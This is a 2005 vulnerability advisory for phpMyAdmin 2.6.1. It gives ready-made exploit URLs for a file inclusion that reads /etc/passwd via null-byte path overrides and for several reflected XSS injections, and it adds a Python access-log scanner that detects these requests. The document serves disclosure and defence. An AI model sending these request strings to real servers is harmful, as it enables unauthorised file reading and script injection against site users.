phpMyAdmin 2.6.1 Remote file inclusion and XSS

2005.09.30
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-98


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

[phpMyAdmin 2.6.1 Remote file inclusion and XSS cXIb8O3.4]

Author: Maksymilian Arciemowicz (cXIb8O3)
Date: 24.2.2005

--- 0. Description ---

phpMyAdmin 2.6.1 is a tool written in PHP intended to handle the administration of MySQL over the Web. Currently it can create and drop databases, create/drop/alter tables, delete/edit/add fields, execute any SQL statement, and manage keys on fields.

--- 1. Remote file inclusion ---

1.0
This bug exists in css/phpmyadmin.css.php. You can include files. The error is in this code:

------
$tmp_file = $GLOBALS['cfg']['ThemePath'] . '/' . $theme . '/css/theme_right.css.php';
if (@file_exists($tmp_file)) {
    include($tmp_file);
} // end of include theme_right.css.php
------

Both parts of that path can be set from the request, so you can get files. For example:

http://[HOST]/[DIR]/css/phpmyadmin.css.php?GLOBALS[cfg][ThemePath]=/etc/passwd%00&theme=passwd%00
http://[HOST]/[DIR]/css/phpmyadmin.css.php?GLOBALS[cfg][ThemePath]=/etc&theme=passwd%00

etc.

1.1
Another include is in libraries/database_interface.lib.php. Code:

------
require_once('./libraries/dbi/' . $cfg['Server']['extension'] . '.dbi.lib.php'); // line 18
------

For example:

http://[HOST]/[DIR]/libraries/database_interface.lib.php?cfg[Server][extension]=cXIb8O3

Error message:

---------------
Warning: main(./libraries/dbi/cXIb8O3.dbi.lib.php) [function.main]: failed to open stream: No such file or directory in /www/phpMyAdmin-2.6.1/libraries/database_interface.lib.php on line 18

Fatal error: main() [function.require]: Failed opening required './libraries/dbi/cXIb8O3.dbi.lib.php' (include_path='.:') in /www/phpMyAdmin-2.6.1/libraries/database_interface.lib.php on line 18
---------------

If PHP error messages are displayed and register_globals=On, the same PHP bug can also be used for XSS. For example:

http://[HOST]/[DIR]/libraries/database_interface.lib.php?cfg[Server][extension]=%3Ch1%3EHi.%20I%20am%20cXIb8O3%3C/h1%3E

--- 2. XSS aka Cross Site Scripting ---

If register_globals=On:

2.0
http://[HOST]/[DIR]/libraries/select_server.lib.php?cfg[Servers][cXIb8O3]=toja&cfg[Servers][sp3x]=toty&show_server_left=MyToMy&strServer=[XSS%20code]
http://[HOST]/[DIR]/libraries/select_server.lib.php?cfg[Servers][cXIb8O3]=toja&cfg[Servers][sp3x]=toty&cfg[BgcolorOne]=777777%22%3E%3CH1%3E[XSS%20code]
http://[HOST]/[DIR]/libraries/select_server.lib.php?cfg[Servers][cXIb8O3]=toja&cfg[Servers][sp3x]=toty&strServerChoice=%3CH1%3EXSS

2.1
http://[HOST]/[DIR]/libraries/display_tbl_links.lib.php?doWriteModifyAt=left&del_url=Smutno&is_display[del_lnk]=Mi&bgcolor=%22%3E[XSS%20code]
http://[HOST]/[DIR]/libraries/display_tbl_links.lib.php?doWriteModifyAt=left&del_url=Smutno&is_display[del_lnk]=Mi&row_no=%22%3E[XSS%20code]

2.2
http://[HOST]/[DIR]/themes/original/css/theme_left.css.php?num_dbs=0&left_font_family=[XSS]
and more in this file.

2.3
http://[HOST]/[DIR]/themes/original/css/theme_right.css.php?right_font_family=[XSS]
and more in this file.

--- 3. How to fix ---

CVS, or
https://sourceforge.net/tracker/download.php?group_id=23067&atid=377408&file_id=122735&aid=1149381 >> libraries/grab_globals.lib.php
or wait for the new version.

--- 4. Contact ---

Author: Maksymilian Arciemowicz
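
The requests in sections 1 and 2 leave a recognisable shape in web server access logs: a query string that sets cfg[...] or GLOBALS[...], a %00 or markup in a value, or a direct request for a file under libraries/. The script below is an added example, not part of the original advisory or of phpMyAdmin; the log lines are constructed, and the rule that files under libraries/ are never requested directly is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Variable names the advisory shows being set from the query string; with
# register_globals=On they overwrite phpMyAdmin's own configuration.
PROTECTED = {"GLOBALS", "cfg"}
# Assumption: files under libraries/ are include-only, never requested directly.
DIRECT_LIB = re.compile(r"/libraries/[^/]+\.lib\.php$")
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def classify(log_line):
    """Return sorted finding names for one combined-format access-log line."""
    m = REQUEST.search(log_line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    findings = set()
    if DIRECT_LIB.search(url.path):
        findings.add("direct-request-to-library-file")
    # parse_qsl percent-decodes, so %00 and %3C are seen as the real characters.
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        if name.split("[", 1)[0] in PROTECTED:
            findings.add("config-variable-override")
        if "\x00" in name or "\x00" in value:
            findings.add("null-byte")
        if re.search(r'[<>"]', value):
            findings.add("html-metacharacters")
    return sorted(findings)

def scan(lines):
    """Return (line_number, findings) for every line with at least one finding."""
    hits = ((n, classify(line)) for n, line in enumerate(lines, 1))
    return [(n, f) for n, f in hits if f]

# Constructed sample log lines (documentation addresses, harmless values).
SAMPLE_LOG = [
    '192.0.2.10 - - [24/Feb/2005:10:00:01 +0100] "GET /phpmyadmin/index.php?lang=en&server=1 HTTP/1.1" 200 5120',
    '192.0.2.10 - - [24/Feb/2005:10:00:02 +0100] "GET /phpmyadmin/css/phpmyadmin.css.php?lang=en HTTP/1.1" 200 2048',
    '198.51.100.7 - - [24/Feb/2005:10:03:11 +0100] "GET /phpmyadmin/css/phpmyadmin.css.php?GLOBALS[cfg][ThemePath]=/tmp&theme=x%00 HTTP/1.1" 200 310',
    '198.51.100.7 - - [24/Feb/2005:10:03:15 +0100] "GET /phpmyadmin/libraries/database_interface.lib.php?cfg[Server][extension]=%3Ch1%3Etest%3C/h1%3E HTTP/1.1" 200 420',
]

if __name__ == "__main__":
    for n, f in scan(SAMPLE_LOG):
        print(f"line {n}: {', '.join(f)}")
```

The ordinary stylesheet request on the second sample line is not flagged, since css/phpmyadmin.css.php is fetched directly by browsers; only the parameter names and values distinguish the third line from it.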

